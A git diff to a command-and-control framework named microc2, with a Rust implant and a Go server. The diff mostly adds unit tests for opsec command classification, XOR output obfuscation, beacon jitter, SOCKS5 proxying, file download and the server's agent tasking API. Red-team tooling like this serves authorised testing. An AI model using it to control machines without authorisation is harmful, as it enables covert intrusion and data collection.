diff --git a/agent/src/commands/command_shell.rs b/agent/src/commands/command_shell.rs index eb172a6..1da6c20 100644 --- a/agent/src/commands/command_shell.rs +++ b/agent/src/commands/command_shell.rs @@ -387,7 +387,9 @@ async fn submit_result_with_client( fn is_weak_command(cmd: &str) -> bool { let quiet = [obfstr!("ping").to_string(), obfstr!("echo").to_string()]; - quiet.iter().any(|q| cmd.starts_with(q)) + quiet + .iter() + .any(|q| starts_with_command_token(cmd, q.as_str())) } fn is_strong_command(cmd: &str) -> bool { @@ -404,7 +406,21 @@ fn is_strong_command(cmd: &str) -> bool { obfstr!("uname").to_string(), obfstr!("cat").to_string(), ]; - noisy.iter().any(|n| cmd.starts_with(n)) + noisy + .iter() + .any(|n| starts_with_command_token(cmd, n.as_str())) +} + +fn starts_with_command_token(cmd: &str, token: &str) -> bool { + let trimmed = cmd.trim_start(); + if !trimmed.starts_with(token) { + return false; + } + + match trimmed[token.len()..].chars().next() { + Some(next) => next.is_whitespace(), + None => true, + } } // Check if the command should be executed based on the current opsec mode @@ -658,4 +674,17 @@ mod tests { assert_eq!(err.kind(), io::ErrorKind::InvalidInput); } + + #[test] + fn classifies_commands_on_token_boundaries() { + assert!(is_weak_command("ping 127.0.0.1")); + assert!(is_weak_command(" echo hello")); + assert!(!is_weak_command("pinger")); + assert!(!is_weak_command("echoed")); + + assert!(is_strong_command("download report.txt")); + assert!(is_strong_command("whoami")); + assert!(!is_strong_command("downloaded")); + assert!(!is_strong_command("echo hello")); + } } diff --git a/agent/src/commands/obfuscated.rs b/agent/src/commands/obfuscated.rs index fa180e8..b098c0c 100644 --- a/agent/src/commands/obfuscated.rs +++ b/agent/src/commands/obfuscated.rs @@ -11,6 +11,10 @@ pub fn xor_obfuscate(data: &str, key: &str) -> String { /// XOR deobfuscate a hex string with a key (agent_id) pub fn xor_deobfuscate(hex: &str, key: &str) -> Option { let key_bytes = key.as_bytes(); + if key_bytes.is_empty() || (hex.len() & 1) != 0 { + return None; + } + let bytes: Result, _> = (0..hex.len()) .step_by(2) .map(|i| u8::from_str_radix(&hex[i..i + 2], 16)) @@ -91,3 +95,33 @@ pub fn random_char_insertion(s: &str, probability: f32) -> String { } result } + +#[cfg(test)] +mod tests { + use super::*; + + #[test] + fn xor_obfuscation_round_trips() { + let obfuscated = xor_obfuscate("command output", "agent-one"); + + assert_ne!(obfuscated, "command output"); + assert_eq!( + xor_deobfuscate(&obfuscated, "agent-one").as_deref(), + Some("command output") + ); + } + + #[test] + fn xor_deobfuscation_rejects_malformed_input() { + assert_eq!(xor_deobfuscate("f", "agent-one"), None); + assert_eq!(xor_deobfuscate("zz", "agent-one"), None); + assert_eq!(xor_deobfuscate("00", ""), None); + } + + #[test] + fn probability_zero_transforms_are_identity() { + assert_eq!(random_case("Echo Ping", 0.0), "Echo Ping"); + assert_eq!(random_quote_insertion("echo ping", 0.0), "echo ping"); + assert_eq!(random_char_insertion("echo", 0.0), "echo"); + } +} diff --git a/agent/src/file_handling/download.rs b/agent/src/file_handling/download.rs index edc6570..9ce053d 100644 --- a/agent/src/file_handling/download.rs +++ b/agent/src/file_handling/download.rs @@ -1,4 +1,3 @@ -use log::{debug, error, info, warn}; use reqwest::Client; // Use reqwest::Client use std::error::Error; use std::path::Path; @@ -30,47 +29,72 @@ mod tests { use super::*; use std::fs; use std::path::PathBuf; - use tokio::runtime::Runtime; + use std::time::{SystemTime, UNIX_EPOCH}; + use tokio::io::{AsyncReadExt, AsyncWriteExt}; + use tokio::net::TcpListener; - // Basic test requires a running web server to serve the file. - // This test structure assumes such a server exists at 127.0.0.1:8080. - #[test] - fn test_download_functionality() { - let rt = Runtime::new().unwrap(); - rt.block_on(async { - let test_file_url = "http://127.0.0.1:8080/test_download.txt"; // Example URL - let download_path = PathBuf::from("downloaded_test_file.txt"); + #[tokio::test] + async fn downloads_successful_response_to_disk() { + let url = spawn_one_response_server("200 OK", b"downloaded body").await; + let download_path = unique_temp_path("download-success.txt"); - // Ensure the test file doesn't exist before download - if download_path.exists() { - fs::remove_file(&download_path).unwrap(); - } + if let Err(err) = download_file(&url, &download_path).await { + panic!("download should succeed: {}", err); + } - // Attempt download - match download_file(test_file_url, &download_path).await { - Ok(_) => { - info!("Download successful."); - // Verify file exists - assert!(download_path.exists()); - // Optional: Verify file content if known - // let content = fs::read_to_string(&download_path).unwrap(); - // assert_eq!(content, "Expected content"); - } - Err(e) => { - // If the server isn't running, this error is expected. - warn!( - "Download failed (is test server running at {}?): {}", - test_file_url, e - ); - // We don't fail the test here, as the server might not be running. - // assert!(false, "Download failed: {}", e); - } - } + let content = must(fs::read_to_string(&download_path), "read downloaded file"); + assert_eq!(content, "downloaded body"); + let _ = fs::remove_file(download_path); + } + + #[tokio::test] + async fn returns_error_for_unsuccessful_response() { + let url = spawn_one_response_server("404 Not Found", b"missing").await; + let download_path = unique_temp_path("download-missing.txt"); + + let err = match download_file(&url, &download_path).await { + Ok(()) => panic!("download should fail for 404 response"), + Err(err) => err, + }; + + assert!(err.to_string().contains("404")); + assert!(!download_path.exists()); + } - // Cleanup - if download_path.exists() { - fs::remove_file(&download_path).unwrap(); - } + async fn spawn_one_response_server(status: &'static str, body: &'static [u8]) -> String { + let listener = must(TcpListener::bind("127.0.0.1:0").await, "bind test server"); + let addr = must(listener.local_addr(), "read test server address"); + tokio::spawn(async move { + let (mut stream, _) = must(listener.accept().await, "accept test request"); + let mut request = [0_u8; 1024]; + let _ = must(stream.read(&mut request).await, "read test request"); + let headers = format!( + "HTTP/1.1 {}\r\nContent-Length: {}\r\nConnection: close\r\n\r\n", + status, + body.len() + ); + must( + stream.write_all(headers.as_bytes()).await, + "write test response headers", + ); + must(stream.write_all(body).await, "write test response body"); }); + format!("http://{}", addr) + } + + fn unique_temp_path(name: &str) -> PathBuf { + let nanos = must( + SystemTime::now().duration_since(UNIX_EPOCH), + "read system time", + ) + .as_nanos(); + std::env::temp_dir().join(format!("microc2-{}-{}-{}", std::process::id(), nanos, name)) + } + + fn must(result: Result, context: &str) -> T { + match result { + Ok(value) => value, + Err(err) => panic!("{}: {}", context, err), + } } } diff --git a/agent/src/networking/socks5.rs b/agent/src/networking/socks5.rs index 51ef41d..7c8845d 100644 --- a/agent/src/networking/socks5.rs +++ b/agent/src/networking/socks5.rs @@ -299,29 +299,30 @@ mod tests { use super::*; #[tokio::test] - async fn test_socks5_connection() { - let client = - Socks5Client::new("127.0.0.1".to_string(), 1080).with_timeout(Duration::from_secs(5)); + async fn rejects_invalid_proxy_address_without_network_io() { + let client = Socks5Client::new("not a socket addr".to_string(), 1080) + .with_timeout(Duration::from_millis(10)); - let result = client.connect_to("example.com".to_string(), 80).await; - match result { - Ok(_) => info!("Connection successful"), - Err(e) => error!("Connection failed: {}", e), + match client.connect_to("example.com".to_string(), 80).await { + Err(Socks5Error::InvalidAddress(_)) => {} + other => panic!("expected invalid proxy address error, got {:?}", other), } } #[tokio::test] - async fn test_socks5_auth_connection() { + async fn zero_retries_returns_failure_without_network_io() { let client = Socks5Client::new("127.0.0.1".to_string(), 1080) .with_auth("user".to_string(), "pass".to_string()) - .with_timeout(Duration::from_secs(5)); + .with_timeout(Duration::from_millis(10)); - let result = client - .connect_with_retries("example.com".to_string(), 80, 3) - .await; - match result { - Ok(_) => info!("Authenticated connection successful"), - Err(e) => error!("Authenticated connection failed: {}", e), + match client + .connect_with_retries("example.com".to_string(), 80, 0) + .await + { + Err(Socks5Error::ConnectionFailed(message)) => { + assert_eq!(message, "Max retries exceeded") + } + other => panic!("expected max retries failure, got {:?}", other), } } } diff --git a/agent/src/util.rs b/agent/src/util.rs index ca8305a..2085005 100644 --- a/agent/src/util.rs +++ b/agent/src/util.rs @@ -4,3 +4,25 @@ pub fn random_jitter(base: u64, jitter: u64) -> u64 { } base + (rand::random::() % (jitter + 1)) } + +#[cfg(test)] +mod tests { + use super::*; + + #[test] + fn random_jitter_returns_base_without_jitter() { + assert_eq!(random_jitter(30, 0), 30); + } + + #[test] + fn random_jitter_stays_within_inclusive_bounds() { + for _ in 0..256 { + let value = random_jitter(30, 5); + assert!( + (30..=35).contains(&value), + "expected jittered value in 30..=35, got {}", + value + ); + } + } +} diff --git a/server/internal/behaviour/http_polling_test.go b/server/internal/behaviour/http_polling_test.go new file mode 100644 index 0000000..d88bdd9 --- /dev/null +++ b/server/internal/behaviour/http_polling_test.go @@ -0,0 +1,156 @@ +package behaviour + +import ( + "bytes" + "encoding/hex" + "encoding/json" + "microc2/server/internal/common" + "net/http" + "net/http/httptest" + "testing" +) + +func TestHTTPPollingProtocolAgentLifecycle(t *testing.T) { + proto := NewHTTPPollingProtocol(common.BaseProtocolConfig{ + UploadDir: t.TempDir(), + Port: "0", + }) + handler := proto.GetHTTPHandler() + agentID := "agent-one" + + heartbeat := map[string]interface{}{ + "id": agentID, + "os": "linux", + "hostname": "workstation", + "ip": "127.0.0.1", + "ip_list": []string{"127.0.0.1"}, + } + heartbeatBody, err := json.Marshal(heartbeat) + if err != nil { + t.Fatalf("marshal heartbeat: %v", err) + } + + rec := httptest.NewRecorder() + req := httptest.NewRequest(http.MethodPost, "/api/agent/"+agentID+"/heartbeat", bytes.NewReader(heartbeatBody)) + handler.ServeHTTP(rec, req) + + if rec.Code != http.StatusOK { + t.Fatalf("expected heartbeat 200, got %d: %s", rec.Code, rec.Body.String()) + } + if _, ok := proto.GetAllAgents()[agentID]; !ok { + t.Fatalf("expected heartbeat to register agent %q", agentID) + } + + proto.QueueCommand(agentID, "whoami") + + rec = httptest.NewRecorder() + req = httptest.NewRequest(http.MethodGet, "/api/agent/"+agentID+"/command", nil) + handler.ServeHTTP(rec, req) + + if rec.Code != http.StatusOK { + t.Fatalf("expected queued command 200, got %d: %s", rec.Code, rec.Body.String()) + } + var command map[string]string + if err := json.Unmarshal(rec.Body.Bytes(), &command); err != nil { + t.Fatalf("decode command response: %v", err) + } + if command["command"] != "whoami" { + t.Fatalf("expected queued command whoami, got %q", command["command"]) + } + + rec = httptest.NewRecorder() + req = httptest.NewRequest(http.MethodGet, "/api/agent/"+agentID+"/command", nil) + handler.ServeHTTP(rec, req) + + if rec.Code != http.StatusNoContent { + t.Fatalf("expected drained command queue to return 204, got %d", rec.Code) + } + + result := CommandResult{ + Command: "whoami", + Output: xorHex("operator\n", agentID), + } + resultBody, err := json.Marshal(result) + if err != nil { + t.Fatalf("marshal result: %v", err) + } + + rec = httptest.NewRecorder() + req = httptest.NewRequest(http.MethodPost, "/api/agent/"+agentID+"/result", bytes.NewReader(resultBody)) + handler.ServeHTTP(rec, req) + + if rec.Code != http.StatusOK { + t.Fatalf("expected result submission 200, got %d: %s", rec.Code, rec.Body.String()) + } + + results := proto.GetResults(agentID) + if len(results) != 1 { + t.Fatalf("expected one stored result, got %d", len(results)) + } + if results[0]["output"] != "operator\n" { + t.Fatalf("expected stored result to be deobfuscated, got %#v", results[0]["output"]) + } +} + +func TestHTTPPollingProtocolRejectsMalformedAndOperatorRoutes(t *testing.T) { + proto := NewHTTPPollingProtocol(common.BaseProtocolConfig{ + UploadDir: t.TempDir(), + Port: "0", + }) + handler := proto.GetHTTPHandler() + + tests := []struct { + name string + method string + path string + body string + wantStatus int + }{ + { + name: "operator route stays outside listener API", + method: http.MethodGet, + path: "/api/agents/list", + wantStatus: http.StatusNotFound, + }, + { + name: "malformed agent route", + method: http.MethodGet, + path: "/api/agent/agent-one", + wantStatus: http.StatusBadRequest, + }, + { + name: "heartbeat requires post", + method: http.MethodGet, + path: "/api/agent/agent-one/heartbeat", + wantStatus: http.StatusMethodNotAllowed, + }, + { + name: "heartbeat rejects invalid json", + method: http.MethodPost, + path: "/api/agent/agent-one/heartbeat", + body: "{", + wantStatus: http.StatusBadRequest, + }, + } + + for _, tt := range tests { + t.Run(tt.name, func(t *testing.T) { + rec := httptest.NewRecorder() + req := httptest.NewRequest(tt.method, tt.path, bytes.NewBufferString(tt.body)) + handler.ServeHTTP(rec, req) + + if rec.Code != tt.wantStatus { + t.Fatalf("expected status %d, got %d: %s", tt.wantStatus, rec.Code, rec.Body.String()) + } + }) + } +} + +func xorHex(data, key string) string { + keyBytes := []byte(key) + out := make([]byte, len(data)) + for i, b := range []byte(data) { + out[i] = b ^ keyBytes[i%len(keyBytes)] + } + return hex.EncodeToString(out) +} diff --git a/server/internal/handlers/api/api_handler_test.go b/server/internal/handlers/api/api_handler_test.go index 05b7817..1792167 100644 --- a/server/internal/handlers/api/api_handler_test.go +++ b/server/internal/handlers/api/api_handler_test.go @@ -1,8 +1,16 @@ package api import ( + "bytes" + "encoding/hex" + "encoding/json" + "microc2/server/internal/behaviour" + "microc2/server/internal/listeners" + "microc2/server/pkg/communication" "net/http" "net/http/httptest" + "os" + "path/filepath" "testing" ) @@ -17,3 +25,233 @@ func TestOperatorAPIDoesNotServeAgentPollingRoutes(t *testing.T) { t.Fatalf("expected operator API to reject agent polling route with 404, got %d", rec.Code) } } + +func TestOperatorAPIQueuesCommandsAndReturnsResults(t *testing.T) { + handler, proto := newTestAPIHandler(t, "agent-one") + + rec := httptest.NewRecorder() + req := jsonRequest(t, http.MethodPost, "/api/agents/command", map[string]string{ + "agent_id": "agent-one", + "command": "whoami", + }) + handler.HandleRequest(rec, req) + + if rec.Code != http.StatusOK { + t.Fatalf("expected body command route 200, got %d: %s", rec.Code, rec.Body.String()) + } + assertNextAgentCommand(t, proto, "agent-one", "whoami") + + rec = httptest.NewRecorder() + req = jsonRequest(t, http.MethodPost, "/api/agents/agent-one/command", map[string]string{ + "command": "pwd", + }) + handler.HandleRequest(rec, req) + + if rec.Code != http.StatusOK { + t.Fatalf("expected path command route 200, got %d: %s", rec.Code, rec.Body.String()) + } + assertNextAgentCommand(t, proto, "agent-one", "pwd") + + postAgentResult(t, proto, "agent-one", "pwd", xorHex("ok\n", "agent-one")) + + rec = httptest.NewRecorder() + req = httptest.NewRequest(http.MethodGet, "/api/agents/agent-one/results", nil) + handler.HandleRequest(rec, req) + + if rec.Code != http.StatusOK { + t.Fatalf("expected results route 200, got %d: %s", rec.Code, rec.Body.String()) + } + var results []map[string]interface{} + if err := json.Unmarshal(rec.Body.Bytes(), &results); err != nil { + t.Fatalf("decode results: %v", err) + } + if len(results) != 1 { + t.Fatalf("expected one result, got %d", len(results)) + } + if results[0]["command"] != "pwd" || results[0]["output"] != "ok\n" { + t.Fatalf("unexpected result payload: %#v", results[0]) + } +} + +func TestOperatorAPIListsAgents(t *testing.T) { + handler, _ := newTestAPIHandler(t, "agent-one") + + rec := httptest.NewRecorder() + req := httptest.NewRequest(http.MethodGet, "/api/agents/list", nil) + handler.HandleRequest(rec, req) + + if rec.Code != http.StatusOK { + t.Fatalf("expected agents list 200, got %d: %s", rec.Code, rec.Body.String()) + } + var agents map[string]interface{} + if err := json.Unmarshal(rec.Body.Bytes(), &agents); err != nil { + t.Fatalf("decode agents list: %v", err) + } + if _, ok := agents["agent-one"]; !ok { + t.Fatalf("expected registered agent in list, got %#v", agents) + } +} + +func TestOperatorAPIRejectsInvalidCommandRequests(t *testing.T) { + handler, _ := newTestAPIHandler(t, "agent-one") + + tests := []struct { + name string + method string + path string + body map[string]string + wantStatus int + }{ + { + name: "body route requires agent id", + method: http.MethodPost, + path: "/api/agents/command", + body: map[string]string{"command": "whoami"}, + wantStatus: http.StatusBadRequest, + }, + { + name: "body route requires command", + method: http.MethodPost, + path: "/api/agents/command", + body: map[string]string{"agent_id": "agent-one"}, + wantStatus: http.StatusBadRequest, + }, + { + name: "path route requires command", + method: http.MethodPost, + path: "/api/agents/agent-one/command", + body: map[string]string{}, + wantStatus: http.StatusBadRequest, + }, + { + name: "unknown agent cannot be queued", + method: http.MethodPost, + path: "/api/agents/missing/command", + body: map[string]string{"command": "whoami"}, + wantStatus: http.StatusInternalServerError, + }, + } + + for _, tt := range tests { + t.Run(tt.name, func(t *testing.T) { + rec := httptest.NewRecorder() + req := jsonRequest(t, tt.method, tt.path, tt.body) + handler.HandleRequest(rec, req) + + if rec.Code != tt.wantStatus { + t.Fatalf("expected status %d, got %d: %s", tt.wantStatus, rec.Code, rec.Body.String()) + } + }) + } +} + +func newTestAPIHandler(t *testing.T, agentID string) (*APIHandler, *behaviour.HTTPPollingProtocol) { + t.Helper() + + tempDir := t.TempDir() + oldCwd, err := os.Getwd() + if err != nil { + t.Fatalf("get cwd: %v", err) + } + if err := os.Chdir(tempDir); err != nil { + t.Fatalf("switch to temp cwd: %v", err) + } + t.Cleanup(func() { + if err := os.Chdir(oldCwd); err != nil { + t.Fatalf("restore cwd: %v", err) + } + }) + + manager, err := communication.NewServerManager(&communication.ServerConfig{ + UploadDir: filepath.Join(tempDir, "uploads"), + Port: "0", + StaticDir: filepath.Join(tempDir, "static"), + ProtocolType: "http", + }) + if err != nil { + t.Fatalf("create server manager: %v", err) + } + + listener, err := listeners.NewListener(listeners.ListenerConfig{ + ID: "listener-one", + Name: "listener-one", + Protocol: "http", + BindHost: "127.0.0.1", + Port: 49001, + }) + if err != nil { + t.Fatalf("create listener: %v", err) + } + proto, ok := listener.Protocol.(*behaviour.HTTPPollingProtocol) + if !ok { + t.Fatalf("expected HTTP polling protocol, got %T", listener.Protocol) + } + heartbeat := []byte(`{"id":"` + agentID + `","os":"linux","hostname":"workstation","ip":"127.0.0.1"}`) + if err := proto.HandleAgentHeartbeat(heartbeat); err != nil { + t.Fatalf("register agent heartbeat: %v", err) + } + if err := manager.GetListenerManager().AddListener(listener); err != nil { + t.Fatalf("add listener: %v", err) + } + + return NewAPIHandler(manager), proto +} + +func jsonRequest(t *testing.T, method, path string, body interface{}) *http.Request { + t.Helper() + + encoded, err := json.Marshal(body) + if err != nil { + t.Fatalf("marshal request body: %v", err) + } + req := httptest.NewRequest(method, path, bytes.NewReader(encoded)) + req.Header.Set("Content-Type", "application/json") + return req +} + +func assertNextAgentCommand(t *testing.T, proto *behaviour.HTTPPollingProtocol, agentID, want string) { + t.Helper() + + rec := httptest.NewRecorder() + req := httptest.NewRequest(http.MethodGet, "/api/agent/"+agentID+"/command", nil) + proto.GetHTTPHandler().ServeHTTP(rec, req) + + if rec.Code != http.StatusOK { + t.Fatalf("expected next command 200, got %d: %s", rec.Code, rec.Body.String()) + } + var response map[string]string + if err := json.Unmarshal(rec.Body.Bytes(), &response); err != nil { + t.Fatalf("decode command response: %v", err) + } + if response["command"] != want { + t.Fatalf("expected command %q, got %q", want, response["command"]) + } +} + +func postAgentResult(t *testing.T, proto *behaviour.HTTPPollingProtocol, agentID, command, output string) { + t.Helper() + + body, err := json.Marshal(map[string]string{ + "command": command, + "output": output, + }) + if err != nil { + t.Fatalf("marshal result: %v", err) + } + rec := httptest.NewRecorder() + req := httptest.NewRequest(http.MethodPost, "/api/agent/"+agentID+"/result", bytes.NewReader(body)) + proto.GetHTTPHandler().ServeHTTP(rec, req) + + if rec.Code != http.StatusOK { + t.Fatalf("post agent result: expected 200, got %d: %s", rec.Code, rec.Body.String()) + } +} + +func xorHex(data, key string) string { + keyBytes := []byte(key) + out := make([]byte, len(data)) + for i, b := range []byte(data) { + out[i] = b ^ keyBytes[i%len(keyBytes)] + } + return hex.EncodeToString(out) +}